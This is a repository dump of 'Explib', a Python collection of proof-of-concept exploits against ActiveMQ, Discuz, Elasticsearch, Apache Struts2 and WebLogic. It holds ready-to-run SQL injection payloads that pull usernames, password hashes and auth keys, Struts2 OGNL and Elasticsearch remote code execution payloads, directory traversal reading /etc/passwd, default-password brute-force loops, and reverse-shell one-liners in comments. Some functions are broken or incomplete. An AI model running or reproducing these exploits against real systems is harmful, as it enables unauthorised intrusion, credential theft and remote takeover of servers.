├── README.md ├── activeMQ.py ├── discuz.py ├── elasticsearch.py ├── struts2.py └── weblogic.py /README.md: -------------------------------------------------------------------------------- 1 | # Explib 2 | Explib: Collections of poc and exp. 3 | -------------------------------------------------------------------------------- /activeMQ.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python 2 | # coding : utf-8 3 | # Date : 2018-04-03 11:53:46 4 | # Author : b4zinga 5 | # Email : b4zinga@outlook.com 6 | # Function: ActiveMQ vuln 7 | 8 | import base64 9 | import requests 10 | 11 | 12 | class ActiveMQ: 13 | def __init__(self, url): 14 | if '://' not in url: 15 | url = 'http://' + url 16 | self.url = url.strip('/') 17 | 18 | def weakPassword(self): 19 | """ActiveMQ weak password""" 20 | weak = ['admin','s3cret','password','p@ssw0rd','1qaz2wsx', 'root', 'activemq', 'ActiveMQ'] 21 | 22 | if ':8161' in self.url: 23 | self.url += '/admin/' 24 | else: 25 | self.url += ':8161/admin/' 26 | 27 | for user in weak: 28 | for pwd in weak: 29 | data = {'Authorization':'Basic '+base64.b64encode((user+':'+pwd).encode()).decode()} 30 | req = requests.get(self.url, headers=data) 31 | 32 | if not "Unauthorized" in req.text: 33 | print('[+] ActiveMQ weak password!\t'+self.url+'\tusername:{}, pwd:{}'.format(user, pwd)) 34 | return True 35 | return False 36 | 37 | def putFile(self, user='admin', pwd='admin'): 38 | """CVE-2016-3088 任意文件上传""" 39 | headers = {'Authorization' : 'Basic ' + base64.b64encode((user + ':' + pwd).encode()).decode()} 40 | data = "shell code" 41 | 42 | req = requests.put(self.url+':8161/fileserver/test.txt', headers=headers, data=data) 43 | if req.status_code == 204: 44 | print('[+] ActiveMQ put file success') 45 | 46 | def moveFile(self, user='admin', pwd='admin'): 47 | headers = { 48 | 'Authorization' : 'Basic ' + base64.b64encode((user + ':' + pwd).encode()).decode(), 49 | 'Destination':'file:/tmp/test.txt', 50 | } 51 | req = requests.request('MOVE', self.url+':8161/fileserver/shell.txt', headers=headers) 52 | if req.status_code == 204: 53 | print('[+] ActiveMQ move file success') 54 | 55 | def deserialization(self): 56 | """Version: < Apache ActiveMQ 5.13.0 57 | ActiveMQ 反序列化漏洞(CVE-2015-5254) 58 | exp: java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616 59 | refer: https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2015-5254 60 | """ 61 | pass 62 | 63 | 64 | 65 | if __name__ == '__main__': 66 | amq = ActiveMQ(url = '192.168.1.129') 67 | amq.pathLeakage() -------------------------------------------------------------------------------- /discuz.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python 2 | # coding : utf-8 3 | # Date : 2018-04-08 16:11:30 4 | # Author : b4zinga 5 | # Email : b4zinga@outlook.com 6 | # Function: Discuz tools 7 | 8 | import requests 9 | import re 10 | 11 | 12 | class Discuz: 13 | def __init__(self, url): 14 | if '://' not in url: 15 | url = 'http://' + url 16 | self.url = url.strip('/') 17 | 18 | @staticmethod 19 | def getInfo(text): 20 | regex = "Duplicate entry '(.*?)'" 21 | items = re.findall(regex, text) 22 | if items: 23 | return items[0] 24 | else: 25 | return "Can't found..." 26 | 27 | def faqSql(self): 28 | """Version: <= 7.2 29 | dz faq.php sql vuln 30 | """ 31 | payload_db_version = '/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23' 32 | req = requests.get(self.url+payload_db_version) 33 | print('[+] Discuz faq.php sql vulnerable ~ ') 34 | print('[+] MySql version: '+self.getInfo(req.text)) 35 | 36 | payload_get_user_pwd_salt = '/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20cdb_uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23' 37 | req = requests.get(self.url+payload_get_user_pwd_salt) 38 | print('[+] username:password:salt ~ '+self.getInfo(req.text)) 39 | 40 | payload_get_key1 = '/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a,(select%20substr(authkey,1,62)%20from%20cdb_uc_applications%20limit%200,1),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23' 41 | payload_get_key2 = '/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a,(select%20substr(authkey,63,64)%20from%20cdb_uc_applications%20limit%200,1),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23' 42 | 43 | req1 = requests.get(self.url+payload_get_key1) 44 | req2 = requests.get(self.url+payload_get_key2) 45 | 46 | uck = self.getInfo(req1.text)[2:]+self.getInfo(req2.text)[2:-1] 47 | 48 | print('[+] uc_key: '+uck) # 62 + 2 49 | 50 | def ucKeyGetShell(self): 51 | """uc_key getshell""" 52 | """refer: https://www.waitalone.cn/discuz-uc_key-getshell.html""" 53 | pass 54 | 55 | 56 | if __name__ == '__main__': 57 | dz = Discuz(url='192.168.1.133:81') 58 | dz.faqSql() 59 | -------------------------------------------------------------------------------- /elasticsearch.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python 2 | # coding : utf-8 3 | # Date : 2018-04-08 12:20:24 4 | # Author : b4zinga 5 | # Email : b4zinga@outlook.com 6 | # Function: 7 | 8 | import requests 9 | import json 10 | 11 | 12 | class ElasticSearch: 13 | def __init__(self, url): 14 | if '://' not in url: 15 | url = 'http://' + url 16 | self.url = url.strip('/') 17 | 18 | def remoteCodeExec(self): 19 | """Version: 1.1.1 20 | CVE-2014-3120""" 21 | headers = {'Content-Type':'application/x-www-form-urlencoded'} 22 | req = requests.post(self.url+':9200/website/blog/', headers=headers, data="""{"name":"test"}""") # es 中至少存在一条数据, so, 创建 23 | # print(req.text) # {"_index":"website","_type":"blog","_id":"gyLnhuVzSBGc9sN1g4v8iQ","_version":1,"created":true} 24 | data ={ 25 | "size": 1, 26 | "query": { 27 | "filtered": { 28 | "query": { 29 | "match_all": { 30 | } 31 | } 32 | } 33 | }, 34 | "script_fields": { 35 | "command": { 36 | "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"whoami\").getInputStream()).useDelimiter(\"\\\\A\").next();" 37 | } 38 | } 39 | } 40 | 41 | req = requests.post(self.url+':9200/_search?pretty', headers=headers, data=json.dumps(data)) 42 | if req.status_code == 200: 43 | print('[+] ElasticSearch Remote Code Exec ~ ') 44 | 45 | result = json.loads(req.text) 46 | print(result['hits']['hits'][0]['fields']['command']) 47 | 48 | 49 | def remoteCodeExec2(self): 50 | """Version: 1.4.2 51 | CVE-2015-1427""" 52 | headers = {'Content-Type':'application/x-www-form-urlencoded'} 53 | req = requests.post(self.url+':9200/website/blog/', headers=headers, data="""{"name":"test"}""") # es 中至少存在一条数据, so, 创建 54 | 55 | data = {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}} 56 | req = requests.post(self.url+':9200/_search?pretty', headers=headers, data=json.dumps(data)) 57 | 58 | if req.status_code == 200: 59 | print('[+] ElasticSearch Remote Code Exec2 ~ ') 60 | print(req.text) 61 | 62 | def dirTraversal(self): 63 | """Version: < 1.4.5 or < 1.5.2 64 | 在安装了具有“site”功能的插件以后,插件目录使用../即可向上跳转,导致目录穿越漏洞,可读取任意文件 65 | CVE-2015-3337""" 66 | req = requests.get(self.url+':9200/_plugin/head/../../../../../../../../../etc/passwd') 67 | if req.status_code == 200: 68 | print('[+] ElasticSearch Directory traversal ~ ') 69 | print(req.text) 70 | 71 | def dirTraversal2(self): 72 | """Version: < 1.6.1 73 | CVE-2015-5531""" 74 | data = { 75 | "type": "fs", 76 | "settings": { 77 | "location": "/usr/share/elasticsearch/repo/test" # /tmp/test 78 | } 79 | } 80 | req = requests.put(self.url + ':9200/_snapshot/test', data=json.dumps(data)) 81 | 82 | if 'true' in req.text and req.status_code == 200: 83 | print('[+] build backup success ') 84 | data2 = { 85 | "type": "fs", 86 | "settings": { 87 | "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" 88 | } 89 | } 90 | req2 = requests.put(self.url+':9200/_snapshot/test2', data=json.dumps(data2)) 91 | if 'true' in req2.text and req2.status_code == 200: 92 | print('[+] build snapshot success ') 93 | 94 | req3 = requests.get(self.url+':9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd') 95 | if req3.status_code == 400: 96 | print('[+] reading /etc/passwd ') 97 | print(req3.text) 98 | 99 | def writeWebshell(self): 100 | """refer: http://cb.drops.wiki/bugs/wooyun-2015-0110216.html""" 101 | pass 102 | 103 | 104 | 105 | 106 | 107 | 108 | if __name__ == '__main__': 109 | es = ElasticSearch(url='192.168.1.129') 110 | es.remoteCodeExec() 111 | es.remoteCodeExec2() 112 | es.dirTraversal() 113 | es.dirTraversal2() 114 | # es.writeWebshell() -------------------------------------------------------------------------------- /struts2.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python 2 | # coding : utf-8 3 | # Date : 2018-03-30 11:27:24 4 | # Author : b4zinga 5 | # Email : b4zinga@outlook.com 6 | # Function: struts2 exploit 7 | 8 | import requests 9 | from urllib import parse 10 | 11 | 12 | class Struts2: 13 | def __init__(self, url): 14 | """init""" 15 | if not 'http' in url: 16 | url = 'http://' + url 17 | self.url = url.strip('/') 18 | 19 | def s2001(self): 20 | """remote code execution""" 21 | 22 | # 获取tomcat执行路径 23 | payload_getTomcat_exec_path = '%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}' 24 | # 获取Web路径 25 | payload_getWeb_path = """%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}""" 26 | # 执行任意命令 27 | payload_exec_cmd = '%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}' 28 | # 执行任意命令(命令加参数:new java.lang.String[]{"cat","/etc/passwd"}): 29 | payload_exec_cmds = '%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}' 30 | 31 | data = { 32 | 'username': payload_exec_cmds, 33 | 'password': payload_exec_cmd, 34 | } 35 | 36 | req = requests.post(url=self.url, data=data) 37 | print(req.text) 38 | 39 | def s2005(self): 40 | """version < Struts 2.2.1 41 | remote code execution 42 | 无回显 43 | CVE-2010-1870""" 44 | payload = """/example/HelloWorld.action?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1""" 45 | 46 | req = requests.get(url=self.url+payload) 47 | if req.text: 48 | print('[+] s2-005 success ') 49 | else: 50 | print(req.text) 51 | 52 | def s2007(self): 53 | """Version : Struts2 2.0.0 - Struts2 2.2.3 54 | remote code execution 55 | 在输入框使用payload""" 56 | payload = """' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '""" 57 | data = {'age': payload, 58 | 'email': 'asd@qq.com', 59 | 'name': 'asd'} 60 | req = requests.post(url=self.url, data=data) 61 | if 'uid' in req.text: 62 | print('[+] s2-007 success ') 63 | print(req.text) 64 | 65 | def s2009(self): 66 | """Version: 2.1.0 - 2.3.1.1 67 | remote code execution 68 | 无回显 69 | CVE-2011-3923""" 70 | # eg: http://192.168.1.129:8080/ajax/example5.action 71 | payload = """?age=12313&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27touch%20/tmp/success%27%29%29%28meh%29&z[%28name%29%28%27meh%27%29]=true""" 72 | req = requests.get(self.url.replace('.action', '') + payload) 73 | if 'touch' in req.text: 74 | print('[+] s2-009 success ') 75 | print(req.text) 76 | 77 | def s2012(self): 78 | """Version: 2.1.0 - 2.3.13 79 | remote code execution 80 | """ 81 | payload = '%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat", "/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}' 82 | 83 | data = {'name': payload} 84 | req = requests.post(self.url, data=data) 85 | print(req.text) 86 | 87 | def s2013(self): 88 | """Version: 2.0.0 - 2.3.14.1 89 | remote code execution 90 | CVE-2013-1966""" 91 | payload = """?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D""" 92 | req = requests.get(self.url+payload) 93 | print(req.text) 94 | 95 | def s2014(self): 96 | """""" 97 | payload = """link.action?xxxx=%24%7B%28%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%29%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29%28@java.lang.Runtime@getRuntime%28%29.exec%28%22open%20%2fApplications%2fCalculator.app%22%29%29%7D""" 98 | return self.s2013() 99 | 100 | def s2015(self): 101 | """Version: 2.0.0 - 2.3.14.2 102 | remote code execution""" 103 | payload = """%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27""" 104 | payload += "id" 105 | payload += """%27%29.getInputStream%28%29%29%2C%23q%7D.action""" 106 | req = requests.get(self.url+payload) 107 | 108 | print(parse.unquote(req.text)) 109 | 110 | def s2016(self): 111 | """Version: 2.0.0 - 2.3.15 112 | remote code execution 113 | CVE-2013-2251""" 114 | payload_exec_cmd = '${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("uname -a").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}' 115 | payload_get_web_path = """${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#ot=#resp.getWriter (),#ot.print('web'),#ot.print('path:'),#ot.print(#req.getSession().getServletContext().getRealPath('/')),#ot.flush(),#ot.close()}""" 116 | 117 | req = requests.get(self.url+'?redirect:'+parse.quote(payload_webshell)) 118 | 119 | print(req.text) 120 | 121 | def s2019(self): 122 | """Version: Struts 2.0.0 – Struts 2.3.15.1 123 | CVE-2013-4316""" 124 | payload = """debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),#req=@org.apache.struts2.ServletActionContext@getRequest(),#resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'aaaaaaaaaaaaaaaaaaa'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[10000],#d.read(#e),#resp.println(#e),#resp.close()""" 125 | 126 | 127 | def s2020(self): 128 | """Version: 2.0.0 - 2.3.16 129 | CVE-2014-0094""" 130 | # 更改属性 131 | payload1 = "?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT" 132 | payload2 = "?class.classLoader.resources.context.parent.pipeline.first.prefix=shell" 133 | payload3 = "?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp" 134 | 135 | # 触发tomcat切换log 从此开始tomcat的access log将被记录入 webapps/ROOT/shell1.jsp中 136 | payload4 = "?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1" 137 | 138 | # 访问在access log 中插入代码 139 | payload5 = '/aaaa.jsp?a=<%Runtime.getRuntime().exec("calc");%>' 140 | 141 | 142 | 143 | 144 | def s2032(self): 145 | """Version: 2.3.18 - 2.3.28 146 | CVE-2016-3081""" 147 | payload = """?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=aaaaaaaaaaaaaaaaaaa&pp=%5C%5CA&ppp=%20&encoding=UTF-8""" 148 | 149 | 150 | 151 | def s2037(self): 152 | """Version: 2.3.20 - 2.3.28.1 153 | CVE-2016-4438""" 154 | payload = """/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=7556&command=aaaaaaaaaaaaaaaaaaa""" 155 | 156 | # dev mode 157 | payload = """?debug=browser&object=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[#parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=aaaaaaaaaaaaaaaaaaa""" 158 | 159 | 160 | 161 | def s2045(self): 162 | """Version: 2.3.5 – 2.3.31 , 2.5 – 2.5.10 163 | remote code execution 164 | CVE-2017-5638""" 165 | header = dict() 166 | header['Content-Type'] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" 167 | 168 | req = requests.get(self.url, headers=header) 169 | 170 | print(req.text) 171 | 172 | def s2046(self): 173 | """Version: 2 2.3.x < 2.3.32, 2.5.x < 2.5.10.1 174 | CVE-2017-5638""" 175 | """ 176 | #!/bin/bash 177 | 178 | url=$1 179 | cmd=$2 180 | shift 181 | shift 182 | 183 | boundary="---------------------------735323031399963166993862150" 184 | content_type="multipart/form-data; boundary=$boundary" 185 | payload=$(echo "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}") 186 | 187 | printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" | curl "$url" -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- $@ 188 | """ 189 | pass 190 | 191 | 192 | def s2048(self): 193 | """Version: 2.0.0 - 2.3.32 194 | remote code execution 195 | CVE-2017-9791""" 196 | 197 | payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" 198 | data = { 199 | '__checkbox_bustedBefore': 'true', 200 | 'age': 'ss', 201 | 'description': 'as', 202 | 'name': payload, 203 | } 204 | 205 | req = requests.post(url=self.url, data=data) 206 | print(req.text) 207 | 208 | def s2052(self): 209 | """Version: 2.1.2-2.3.33, 2.5-2.5.12 210 | remote code execution 211 | 无回显 212 | CVE-2017-9805""" 213 | payload = ' 0 false 0 ' 214 | payload += 'touch /tmp/success' 215 | payload += ' false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 ' 216 | 217 | headers = {'User-Agent': 'Mozilla/5.0', 218 | 'Content-Type': 'application/xml'} 219 | 220 | req = requests.post(self.url, headers=headers, data=payload) 221 | if req.status_code == 500: 222 | print('[+] s2-052 success ') 223 | 224 | def s2053(self): 225 | """Version: 2.0.1/2.3.33/2.5-2.5.10 226 | remote code execution""" 227 | payload = """%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='""" 228 | payload += 'cat /etc/passwd' 229 | # payload += 'bash -i >& /dev/tcp/192.168.1.133/4444 0>&1' 230 | payload += """').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}\n""" 231 | headers = { 232 | 'redirectUri':payload 233 | } 234 | 235 | req = requests.post(self.url, data=headers) 236 | 237 | if 'root' in req.text: 238 | print('[+] s2-053 success ') 239 | print(req.text) 240 | 241 | 242 | if __name__ == '__main__': 243 | url = 'http://192.168.1.129:8080/hello.action' 244 | st = Struts2(url) 245 | print(help(st)) 246 | -------------------------------------------------------------------------------- /weblogic.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python 2 | # coding : utf-8 3 | # Date : 2018-04-03 19:08:00 4 | # Author : b4zinga 5 | # Email : b4zinga@outlook.com 6 | # Function: weblogic vuln 7 | 8 | import requests 9 | 10 | 11 | class WebLogic: 12 | def __init__(self, url): 13 | if '://' not in url: 14 | url = 'http://' + url 15 | self.url = url.strip('/') 16 | 17 | def xmlDecoder(self): 18 | """Version:10.3.6.0.0/12.1.3.0.0/12.2.1.1.0 19 | CVE-2017-10271 20 | """ 21 | headers = { 22 | "Content-Type":"text/xml;charset=UTF-8", 23 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 24 | } 25 | 26 | # bash -i >& /dev/tcp/192.168.1.133/4444 0>&1 27 | xml = """ 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | /bin/bash 36 | 37 | 38 | -c 39 | 40 | 41 | id > /tmp/b4 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | """ 50 | req = requests.post(self.url+":7001/wls-wsat/CoordinatorPortType", headers=headers, data=xml) 51 | if req.status_code == 500 : 52 | print('[+] WebLogic xml decoder ') 53 | # print(req.text) 54 | 55 | def weakPasswd(self): 56 | """weak password""" 57 | 58 | pwddict = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem'] 59 | for user in pwddict: 60 | for pwd in pwddict: 61 | data = { 62 | 'j_username':user, 63 | 'j_password':pwd, 64 | 'j_character_encoding':'UTF-8' 65 | } 66 | req = requests.post(self.url+':7001/console/j_security_check', data=data, allow_redirects=False, verify=False) 67 | 68 | if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text: 69 | print('[+] WebLogic username: '+user+' password: '+pwd) 70 | 71 | def ssrf(self): 72 | """Version: 10.0.2/10.3.6 73 | CVE-2014-4210""" 74 | # payload = ":7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001" 75 | payload = ":7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search" 76 | 77 | req = requests.get(self.url+payload, timeout=10, verify=False) 78 | if "weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and "IO Exception on sendMessage" not in req.text: 79 | print("[+] WebLogic ssrf") 80 | 81 | 82 | 83 | if __name__ == '__main__': 84 | url = '192.168.136.130' 85 | wls = WebLogic(url) 86 | 87 | wls.xmlDecoder() 88 | wls.weakPasswd() 89 | wls.ssrf() 90 | --------------------------------------------------------------------------------